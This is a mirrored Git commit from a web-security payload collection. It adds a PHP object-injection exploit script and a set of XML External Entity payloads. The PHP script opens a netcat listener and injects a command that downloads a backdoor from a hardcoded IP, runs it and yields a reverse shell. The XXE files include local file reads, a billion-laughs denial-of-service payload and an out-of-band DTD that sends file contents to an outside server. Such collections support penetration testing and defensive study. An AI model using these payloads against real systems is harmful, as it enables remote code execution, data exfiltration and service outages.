mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
XXE payloads
This commit is contained in:
parent
c874dad3e9
commit
c097f222f4
32
PHP_Serialization/PHP-Serialization-RCE-Exploit.php
Executable file
32
PHP_Serialization/PHP-Serialization-RCE-Exploit.php
Executable file
@ -0,0 +1,32 @@
|
|||||||
|
<?php
|
||||||
|
/*
|
||||||
|
PHP Object Injection PoC Exploit by 1N3 @CrowdShield - https://crowdshield.com
|
||||||
|
|
||||||
|
A simple PoC to exploit PHP Object Injections flaws and gain remote shell access.
|
||||||
|
|
||||||
|
Shouts to @jstnkndy @yappare for the assist!
|
||||||
|
|
||||||
|
NOTE: This requires http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz setup on a remote host with a connect back IP configured
|
||||||
|
*/
|
||||||
|
|
||||||
|
print "==============================================================================\r\n";
|
||||||
|
print "PHP Object Injection PoC Exploit by 1N3 @CrowdShield - https://crowdshield.com\r\n";
|
||||||
|
print "==============================================================================\r\n";
|
||||||
|
print "[+] Generating serialized payload...[OK]\r\n";
|
||||||
|
print "[+] Launching reverse listener...[OK]\r\n";
|
||||||
|
system('gnome-terminal -x sh -c \'nc -lvvp 4242\'');
|
||||||
|
|
||||||
|
class PHPObjectInjection
|
||||||
|
{
|
||||||
|
// CHANGE URL/FILENAME TO MATCH YOUR SETUP
|
||||||
|
public $inject = "system('wget http://92.222.81.2/backdoor.txt -O phpobjbackdoor.php && php phpobjbackdoor.php');";
|
||||||
|
}
|
||||||
|
|
||||||
|
$url = 'http://localhost/xvwa/vulnerabilities/php_object_injection/?r='; // CHANGE TO TARGET URL/PARAMETER
|
||||||
|
$url = $url . urlencode(serialize(new PHPObjectInjection));
|
||||||
|
print "[+] Sending exploit...[OK]\r\n";
|
||||||
|
print "[+] Dropping down to interactive shell...[OK]\r\n";
|
||||||
|
print "==============================================================================\r\n";
|
||||||
|
$response = file_get_contents("$url");
|
||||||
|
|
||||||
|
?>
|
18
README.md
18
README.md
@ -1,4 +1,18 @@
|
|||||||
/!\ Work in Progress : 1%
|
|
||||||
|
|
||||||
# PayloadsAllTheThings
|
# PayloadsAllTheThings
|
||||||
A list of every usefull payloads and bypass for Web Application Security
|
A list of every usefull payloads and bypass for Web Application Security
|
||||||
|
|
||||||
|
TODO:
|
||||||
|
* XSS
|
||||||
|
* Upload
|
||||||
|
* Traversal Directory
|
||||||
|
* Tar
|
||||||
|
* SSRF
|
||||||
|
* PHP Serialization
|
||||||
|
* CSV Injection
|
||||||
|
|
||||||
|
To improve:
|
||||||
|
* RCE
|
||||||
|
* SQL injection
|
||||||
|
* XXE
|
||||||
|
|
||||||
|
# /!\ Work in Progress : 1%
|
||||||
|
1
XXE/Classic XXE B64 Encoded.xml
Executable file
1
XXE/Classic XXE B64 Encoded.xml
Executable file
@ -0,0 +1 @@
|
|||||||
|
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,PCFF...Cg=="> %init; ]><foo/>
|
6
XXE/Classic XXE.xml
Executable file
6
XXE/Classic XXE.xml
Executable file
@ -0,0 +1,6 @@
|
|||||||
|
<?xml version="1.0"?>
|
||||||
|
<!DOCTYPE data [
|
||||||
|
<!ELEMENT data (#ANY)>
|
||||||
|
<!ENTITY file SYSTEM "file:///sys/power/image_size">
|
||||||
|
]>
|
||||||
|
<data>&file;</data>
|
8
XXE/Deny Of Service - Billion Laugh Attack
Executable file
8
XXE/Deny Of Service - Billion Laugh Attack
Executable file
@ -0,0 +1,8 @@
|
|||||||
|
<!DOCTYPE data [
|
||||||
|
<!ENTITY a0 "dos" >
|
||||||
|
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
|
||||||
|
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
|
||||||
|
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
|
||||||
|
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
|
||||||
|
]>
|
||||||
|
<data>&a4;</data>
|
@ -1,12 +1,48 @@
|
|||||||
# Title
|
# XML External Entity
|
||||||
Lorem
|
An XML External Entity attack is a type of attack against an application that parses XML input
|
||||||
|
|
||||||
## Vuln
|
## Exploit
|
||||||
|
|
||||||
|
Classic XXE
|
||||||
```
|
```
|
||||||
Code
|
<?xml version="1.0"?>
|
||||||
|
<!DOCTYPE data [
|
||||||
|
<!ELEMENT data (#ANY)>
|
||||||
|
<!ENTITY file SYSTEM "file:///sys/power/image_size">
|
||||||
|
]>
|
||||||
|
<data>&file;</data>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Classic XXE Base64 encoded
|
||||||
|
```
|
||||||
|
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,PCFF...Cg=="> %init; ]><foo/>
|
||||||
|
```
|
||||||
|
|
||||||
|
Deny Of Service - Billion Laugh Attack
|
||||||
|
```
|
||||||
|
<!DOCTYPE data [
|
||||||
|
<!ENTITY a0 "dos" >
|
||||||
|
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
|
||||||
|
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
|
||||||
|
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
|
||||||
|
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
|
||||||
|
]>
|
||||||
|
<data>&a4;</data>
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
XXE OOB Attack (Yunusov, 2013)
|
||||||
|
```
|
||||||
|
<?xml version="1.0" encoding="utf-8"?>
|
||||||
|
<!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd">
|
||||||
|
<data>&send;</data>
|
||||||
|
|
||||||
|
File stored on http://publicServer.com/parameterEntity_oob.dtd
|
||||||
|
<!ENTITY % file SYSTEM "file:///sys/power/image_size">
|
||||||
|
<!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>">
|
||||||
|
%all;
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## Thanks to
|
## Thanks to
|
||||||
* Lorem
|
* https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
|
||||||
* Ipsum
|
|
9
XXE/XXE OOB Attack (Yunusov, 2013).xml
Executable file
9
XXE/XXE OOB Attack (Yunusov, 2013).xml
Executable file
@ -0,0 +1,9 @@
|
|||||||
|
XXE OOB Attack (Yunusov, 2013)
|
||||||
|
<?xml version="1.0" encoding="utf-8"?>
|
||||||
|
<!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd">
|
||||||
|
<data>&send;</data>
|
||||||
|
|
||||||
|
File stored on http://publicServer.com/parameterEntity_oob.dtd
|
||||||
|
<!ENTITY % file SYSTEM "file:///sys/power/image_size">
|
||||||
|
<!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>">
|
||||||
|
%all;
|
Loading…
Reference in New Issue
Block a user